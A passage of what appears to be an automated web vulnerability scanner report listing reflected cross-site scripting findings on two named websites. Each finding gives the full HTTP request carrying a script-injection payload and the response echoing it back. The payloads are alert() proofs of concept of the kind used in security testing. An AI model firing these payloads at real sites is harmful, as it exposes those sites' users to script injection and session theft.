Cookie: ASPSESSIONIDSQQCTAQA=KHEEKNBBHJMPFGDEDDNMBPHF; __utmz=252525594.1296786866.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=252525594.371918977.1296786866.1296786866.1296786866.1; __utmc=252525594; __utmb=252525594.1.10.1296786866

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 18:00:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 15800
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSDQDQB=FDMOGJOBLPHILKAOOAOJGEGF; path=/
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Bizfind - PORTAL OF USA COMPANIES</title>
<meta name="descrip
...[SNIP]...
<a href="http://www.bizfind.us/Index.asp?97bfe"><script>alert(1)</script>18ca5e0718d=1" rel="nofollow">
...[SNIP]...

3.80. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bizfind.us
Path:   /15/182221/abc-development-inc/chicago.aspx/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9ef9"><script>alert(1)</script>dd38641bfde was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /15/182221/abc-development-inc/chicago.aspx/x22?d9ef9"><script>alert(1)</script>dd38641bfde=1 HTTP/1.1
Host: www.bizfind.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 21:48:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 11704
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQQCTAQA=JDEEKNBBLGAHBJGBEKACDHHM; path=/
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22</title>
<meta name="descrip
...[SNIP]...
<a href="http://www.bizfind.us/schedaazienda.asp?idregione=15&isid=182221&ragionesociale=abc-development-inc&idcomune1=chicago/x22&d9ef9"><script>alert(1)</script>dd38641bfde=1" rel="nofollow">
...[SNIP]...

3.81. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bizfind.us
Path:   /15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)

Issue detail

The value of REST URL parameter 6 is copied into the name of an HTML tag attribute. The payload 3c056%20a%3dbd8be886654d was submitted in the REST URL parameter 6. This input was echoed as 3c056 a=bd8be886654d in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /15/182221/abc-development-inc/chicago.aspx/x22/%22ns3c056%20a%3dbd8be886654d=%22alert(0x0006C1) HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.bizfind.us

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 18:01:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 12113
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSDQDQB=IOMOGJOBLGKMEEODHDPJNBFA; path=/
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22/"NS3C056A=BD8BE886654D="ALER
...[SNIP]...
<area shape="rect" rel="nofollow" alt="italian" href="javascript:crealink('http://www.bizfind.us/schedaazienda.asp?idregione=15&isid=182221&ragionesociale=abc-development-inc&idcomune1=chicago/x22/"ns3c056 a=bd8be886654d="alert(0x0006C1)')" coords="0,0,22,15">
...[SNIP]...

3.82. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bizfind.us
Path:   /15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21fc8"><script>alert(1)</script>3c5d1bbb05c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)?21fc8"><script>alert(1)</script>3c5d1bbb05c=1 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.bizfind.us

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 18:00:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 12152
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSDQDQB=CCMOGJOBOEJLBIDGEPLHOCKP; path=/
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22/"NS="ALERT(0X0006C1)</title>
...[SNIP]...
<a href="http://www.bizfind.us/schedaazienda.asp?idregione=15&isid=182221&ragionesociale=abc-development-inc&idcomune1=chicago/x22/"ns="alert(0x0006C1)&21fc8"><script>alert(1)</script>3c5d1bbb05c=1" rel="nofollow">
...[SNIP]...

3.83. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bizfind.us
Path:   /15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the name of an HTML tag attribute. The payload 55cfe><a>a5947f68df6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)?55cfe><a>a5947f68df6=1 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.bizfind.us

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 18:00:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 11931
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSDQDQB=DNLOGJOBDBDLOPJCCANBACKG; path=/
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22/"NS="ALERT(0X0006C1)</title>
...[SNIP]...
k('traduction.asp?lang=en&amp;dir=http%3A%2F%2Fwww.bizfind.us%2Fschedaazienda.asp%3Fidregione%3D15|isid%3D182221|ragionesociale%3Dabc-development-inc|idcomune1%3Dchicago%2Fx22%2F"ns%3D"alert(0x0006C1)|55cfe><a>a5947f68df6%3D1')" coords="72,0,95,15">
...[SNIP]...

3.84. http://www.butterscotch.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f74ff'><script>alert(1)</script>d34a3b78cab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?f74ff'><script>alert(1)</script>d34a3b78cab=1 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=b960dd1072a2f3a840f705ff54740c17; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: b960dd1072a2f3a840f705ff54740c17=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siD7RLYJm73OfIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 63431

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type='hidden' name='ref' value='/?f74ff'><script>alert(1)</script>d34a3b78cab=1' />
...[SNIP]...

3.85. http://www.butterscotch.com/ [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 231c0'><script>alert(1)</script>53794fb9664 was submitted in the src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?src=tcv3video231c0'><script>alert(1)</script>53794fb9664 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=4f0045cb2a5d7807aff4f74328f19c8e; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 4f0045cb2a5d7807aff4f74328f19c8e=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siD7RLYJm73OfIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 63381

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type='hidden' name='ref' value='/?src=tcv3video231c0'><script>alert(1)</script>53794fb9664' />
...[SNIP]...

3.86. http://www.butterscotch.com/shows/A-List [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/A-List

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2f0b4'><script>alert(1)</script>f96c8436d8c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/A-List2f0b4'><script>alert(1)</script>f96c8436d8c HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:10 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=1bdc60d8c9f8abf938a1f22889b51782; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 1bdc60d8c9f8abf938a1f22889b51782=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50406

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type='hidden' name='ref' value='/shows/A-List2f0b4'><script>alert(1)</script>f96c8436d8c' />
...[SNIP]...

3.87. http://www.butterscotch.com/shows/A-List [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/A-List

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8c40"><script>alert(1)</script>23d9018f7a3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/A-Lista8c40"><script>alert(1)</script>23d9018f7a3 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:06 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=5e0345a822ab339bca2c7c84855acc0c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 5e0345a822ab339bca2c7c84855acc0c=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50395

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type=hidden name=ref value="http://www.butterscotch.com/shows/A-Lista8c40"><script>alert(1)</script>23d9018f7a3" />
...[SNIP]...

3.88. http://www.butterscotch.com/shows/A-List [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/A-List

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f0c8"-alert(1)-"39e9638a1ff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shows/A-List7f0c8"-alert(1)-"39e9638a1ff HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:19 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=8826b85f90e6e25f1b2bd4d9bfec5172; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 8826b85f90e6e25f1b2bd4d9bfec5172=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50348

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<script>
WS_AJAX = "http://www.butterscotch.com/includes/ajax/";

   loggedIn    = false;
   

topTab = 'sho';
url = "http://www.butterscotch.com/shows/A-List7f0c8"-alert(1)-"39e9638a1ff";

</script>
...[SNIP]...

3.89. http://www.butterscotch.com/shows/AT [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/AT

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9be04'><script>alert(1)</script>43f8c6292e2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/AT9be04'><script>alert(1)</script>43f8c6292e2 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=ee4acbcf205d38f8c695616e3a019909; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ee4acbcf205d38f8c695616e3a019909=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50376

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type='hidden' name='ref' value='/shows/AT9be04'><script>alert(1)</script>43f8c6292e2' />
...[SNIP]...

3.90. http://www.butterscotch.com/shows/AT [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/AT

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30613"-alert(1)-"94f0bdba78e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shows/AT30613"-alert(1)-"94f0bdba78e HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:13 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=1771e39f97e82be5a5c155fe5c62274c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 1771e39f97e82be5a5c155fe5c62274c=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50279

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<script>
WS_AJAX = "http://www.butterscotch.com/includes/ajax/";

   loggedIn    = false;
   

topTab = 'sho';
url = "http://www.butterscotch.com/shows/AT30613"-alert(1)-"94f0bdba78e";

</script>
...[SNIP]...

3.91. http://www.butterscotch.com/shows/AT [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/AT

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 259d1"><script>alert(1)</script>966a5ade193 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/AT259d1"><script>alert(1)</script>966a5ade193 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:04 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=b38aa8055bf37effd925e13cec8e7d9d; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: b38aa8055bf37effd925e13cec8e7d9d=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50494

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type=hidden name=ref value="http://www.butterscotch.com/shows/AT259d1"><script>alert(1)</script>966a5ade193" />
...[SNIP]...

3.92. http://www.butterscotch.com/shows/Lab-Rats [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/Lab-Rats

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1cdff'><script>alert(1)</script>7fc59e7282f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/Lab-Rats1cdff'><script>alert(1)</script>7fc59e7282f HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:15 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=f83e5edc74f32490e6d7c846e45b30e4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: f83e5edc74f32490e6d7c846e45b30e4=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50417

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type='hidden' name='ref' value='/shows/Lab-Rats1cdff'><script>alert(1)</script>7fc59e7282f' />
...[SNIP]...

3.93. http://www.butterscotch.com/shows/Lab-Rats [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/Lab-Rats

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 605d2"><script>alert(1)</script>0f550289d8e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/Lab-Rats605d2"><script>alert(1)</script>0f550289d8e HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:08 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=4cbfaeec7ed123668b3a45cda4a1424b; path=/
